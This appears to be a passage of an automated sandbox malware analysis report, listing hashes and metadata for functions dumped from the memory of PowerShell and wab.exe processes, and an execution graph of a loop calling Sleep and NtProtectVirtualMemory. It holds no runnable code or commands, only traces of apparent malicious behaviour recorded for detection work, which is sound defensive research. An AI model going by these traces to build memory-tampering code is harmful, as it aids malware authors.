                                                        • Instruction ID: c3484115931c8d8354f9e180d238d51a78512728eb8b41bf02ce7251e71d1576
                                                        • Opcode Fuzzy Hash: 003572f189496e90696b325e43fa8f4dff80b218b64da00c4575753adc8dcde9
                                                        • Instruction Fuzzy Hash: DC51CA74A00209EFDB15CFA8D494A9DFBB2FF88314F288559E804AB365D771AD82CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04657A53 Relevance: .1, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c96c3525749f5abe692a4b11647fae35f87bfce3ed7d6c92b7ae5af05a7a0238
                                                        • Instruction ID: 093ba5882062eacfab5ff1bf2764ce3b90a89807324d3a6e67da4a4cf7031115
                                                        • Opcode Fuzzy Hash: c96c3525749f5abe692a4b11647fae35f87bfce3ed7d6c92b7ae5af05a7a0238
                                                        • Instruction Fuzzy Hash: 30416C70A00218CFDB14DFB9C8447AEBBB2BF89341F14856DD405AB7A1EB75A949CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04652BB0 Relevance: .1, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b4e8ff75ba7ff2a7e54853b9bd8fe05065648120d6f91a40d70667e67a51497
                                                        • Instruction ID: 8beeaa8ea3d818b3f81e3c7f4e5ef1df75ab279ab44c57448d69a28a8cb6906c
                                                        • Opcode Fuzzy Hash: 8b4e8ff75ba7ff2a7e54853b9bd8fe05065648120d6f91a40d70667e67a51497
                                                        • Instruction Fuzzy Hash: 174146B4A00609CFCB05CF59C5A4AAAFBB1FF48310B118699D905AB365D736FC50CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07185528 Relevance: .1, Instructions: 102COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c11f751b910342da3474142c2750eeb6504ca7414ad1693aa54ad7ad3a48cbae
                                                        • Instruction ID: 15863c9d393bdd976b0bfe0991f4e28298e5cf72b8b750121720530e81f04d55
                                                        • Opcode Fuzzy Hash: c11f751b910342da3474142c2750eeb6504ca7414ad1693aa54ad7ad3a48cbae
                                                        • Instruction Fuzzy Hash: 16317A71B402049FEB04EB64C861FAE77A3ABC5354F20C028E9056F391CE769E528B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07181518 Relevance: .1, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c092a5644ab7ec3c9d851fb6c23d6b8aa7057188f34c7ea9f8979d88255a771e
                                                        • Instruction ID: 314aadc0a17f34abe3053caed24b3a9859a6618f8715f8fb89e85c56e2a006b7
                                                        • Opcode Fuzzy Hash: c092a5644ab7ec3c9d851fb6c23d6b8aa7057188f34c7ea9f8979d88255a771e
                                                        • Instruction Fuzzy Hash: 1D214CB3300309ABE7A46A6E8811B77B7A69BC2711F24413EE507C72C5DF75C8429B61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 071813E8 Relevance: .1, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 708e3ee24e44c8cc897a1348fa3578e6ce3355cafd37d1678719ff55c823dc4e
                                                        • Instruction ID: 0a64d6c7e4ac6862144de46a23d0d4e79b3f75304b9896779720f475665c3a30
                                                        • Opcode Fuzzy Hash: 708e3ee24e44c8cc897a1348fa3578e6ce3355cafd37d1678719ff55c823dc4e
                                                        • Instruction Fuzzy Hash: CC218B7330430AABE7A46A6A8801B7B77D69FC5711F28842EE506CB3C5EF75C8429760
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0465D517 Relevance: .1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6865f79333304e5d94a3b4af7135f67e1c262b080f2ea76f19d4f39072108f6a
                                                        • Instruction ID: 1d6d78923581e8e650864497635c7fc31312a1abf080f1ce818ae90bfa342a0d
                                                        • Opcode Fuzzy Hash: 6865f79333304e5d94a3b4af7135f67e1c262b080f2ea76f19d4f39072108f6a
                                                        • Instruction Fuzzy Hash: 4241F2B0D00349DFEB10CFA9C484ADEBBF5FF48314F148029E809AB260DB75A946CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0465D520 Relevance: .1, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a961052a4cff545b9933ce1bb63ab8cbafd041331ead97a14d53eaceec4a1f39
                                                        • Instruction ID: 701329409e39ba1ab58802ea156c64f187d18539a377d75329c2021d062df55b
                                                        • Opcode Fuzzy Hash: a961052a4cff545b9933ce1bb63ab8cbafd041331ead97a14d53eaceec4a1f39
                                                        • Instruction Fuzzy Hash: 2141C0B0D00349DFEB10DF99C594ADEBBF5BF48714F148029E809AB250DB75A945CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07185982 Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 328c0f95978edeae9e40628ae1cfd901a3d7e927ff9d80bbcc610562fa122201
                                                        • Instruction ID: 91a38962fbfbe3970b5a23dce2619497e37b2670832619bca283709d456323b1
                                                        • Opcode Fuzzy Hash: 328c0f95978edeae9e40628ae1cfd901a3d7e927ff9d80bbcc610562fa122201
                                                        • Instruction Fuzzy Hash: 842148B1A043019FCB95AB7484817BA7FE3DB81651F544069E805CF2C6EB359971CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0465ADD0 Relevance: .1, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 61159eb3a385cde341df2c063c246e598127d2c3847c9d2f28116197c5307c44
                                                        • Instruction ID: e26e9ea1f92beed4a300c84191544e737d8ce042ef37bff5e15045b1e1034b24
                                                        • Opcode Fuzzy Hash: 61159eb3a385cde341df2c063c246e598127d2c3847c9d2f28116197c5307c44
                                                        • Instruction Fuzzy Hash: DF312970A00609DFCB14CF99C584AAAFBF2FF49310B258699D958A7761D731FC51CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 071813CD Relevance: .1, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4002892d12b800e91018b49e338a91a9921395338c966698ecb7f1eef03473d6
                                                        • Instruction ID: b8eb2f2adca14cb7dbf6677ee7953dde925951341b5e9efdb06fb7f031143423
                                                        • Opcode Fuzzy Hash: 4002892d12b800e91018b49e338a91a9921395338c966698ecb7f1eef03473d6
                                                        • Instruction Fuzzy Hash: DF219BB230434AAFE7612A764801BB63BA25F82711F1C402EE541CB2C6E728C9429730
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 071814F9 Relevance: .1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2eb293b0dad95b691dc03c2fee26b034e51510dc7ad8dcc1666c9c545d99ce42
                                                        • Instruction ID: a4765a3c00959cda6b6e57606b886e61485c2a64b9f5328e3fa694334a4835ec
                                                        • Opcode Fuzzy Hash: 2eb293b0dad95b691dc03c2fee26b034e51510dc7ad8dcc1666c9c545d99ce42
                                                        • Instruction Fuzzy Hash: E7216BB32083896FEB6216294C107B36F714F83310F19426FE586CB1C7D668C546DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 071811D8 Relevance: .1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f029887b0221530d429352827b67b778cac6ed8b4e08812f79e56ee8ffde0a8
                                                        • Instruction ID: 14929876105fffd91d7f6ab9fc0858e7ce8dfad46f9b8f3b8cc4a9ace3f89578
                                                        • Opcode Fuzzy Hash: 1f029887b0221530d429352827b67b778cac6ed8b4e08812f79e56ee8ffde0a8
                                                        • Instruction Fuzzy Hash: 39014C3730021AEBC76565AA940057AF7D79BD6122F24C03FD545C7680D731C402EB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0465B1F4 Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1867677077907b9348355a8edc11e2ca21d004b7a789e1de0f851bf6d87867e5
                                                        • Instruction ID: 4cc5cc8fea2d06c4959c84e351fe35570f1cab8dd72264cba2af38e8f4e4242c
                                                        • Opcode Fuzzy Hash: 1867677077907b9348355a8edc11e2ca21d004b7a789e1de0f851bf6d87867e5
                                                        • Instruction Fuzzy Hash: 60111934A00209EFDB45CFA8D894E9DBBB2FF48314F288559E804AB365D771AC82CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0095D01D Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2905737683.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_95d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cccc9e40f9970c8f8003b2498e2e5169fddf2b8842f651d42aa7107b67574ddd
                                                        • Instruction ID: 738a78737a5cfca595693a9fd909dc6fccd339bfd3342193ad9ee54bf35629b0
                                                        • Opcode Fuzzy Hash: cccc9e40f9970c8f8003b2498e2e5169fddf2b8842f651d42aa7107b67574ddd
                                                        • Instruction Fuzzy Hash: CE01F731006340EAE720CA36D980B67FF9CEF42325F188419ED081A2C2C2789949C7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0095D005 Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2905737683.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_95d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 14d630958b4cf4c686b3b700bed407967462dd6d263116244bb977834abaadc4
                                                        • Instruction ID: 3069b8a78e0324ca7cd50d85f875d0d065dd56f75cf1517524f9dc5c9c26eaa6
                                                        • Opcode Fuzzy Hash: 14d630958b4cf4c686b3b700bed407967462dd6d263116244bb977834abaadc4
                                                        • Instruction Fuzzy Hash: 26014C6100E3C09EE7128B258894B52BFB8EF53225F1881DBDD888F2D3C2695849C772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:3.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:100%
                                                        Total number of Nodes:4
                                                        Total number of Limit Nodes:0
                                                        execution_graph 221 5c4c53d 222 5c4c585 221->222 222->221 223 5c4c5d0 Sleep 222->223 224 5c4c5da NtProtectVirtualMemory 222->224 223->221 224->222

                                                        Executed Functions

                                                        Function 05C4C53D Relevance: 3.1, APIs: 2, Instructions: 52sleepnativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • Sleep.KERNEL32(00000005), ref: 05C4C5D2
                                                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 05C4C621
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3316408307.0000000005712000.00000040.00000400.00020000.00000000.sdmp, Offset: 05712000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_5712000_wab.jbxd
                                                        Similarity
                                                        • API ID: MemoryProtectSleepVirtual
                                                        • String ID:
                                                        • API String ID: 3235210055-0
                                                        • Opcode ID: 97ff6069b18f2fae4f4c45e159c70b3450bb74d014f4a24ec967c84f64ffd2fd
                                                        • Instruction ID: ccd0f57f7d22364f69c2add48c11b6964056183a2322f5c12c50e5598e11bf6e
                                                        • Opcode Fuzzy Hash: 97ff6069b18f2fae4f4c45e159c70b3450bb74d014f4a24ec967c84f64ffd2fd
                                                        • Instruction Fuzzy Hash: 6E1123B16453418FE3049E7A898CF4E77A5AF14355F0286A8EE05CB0B5DB74CDC08E11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%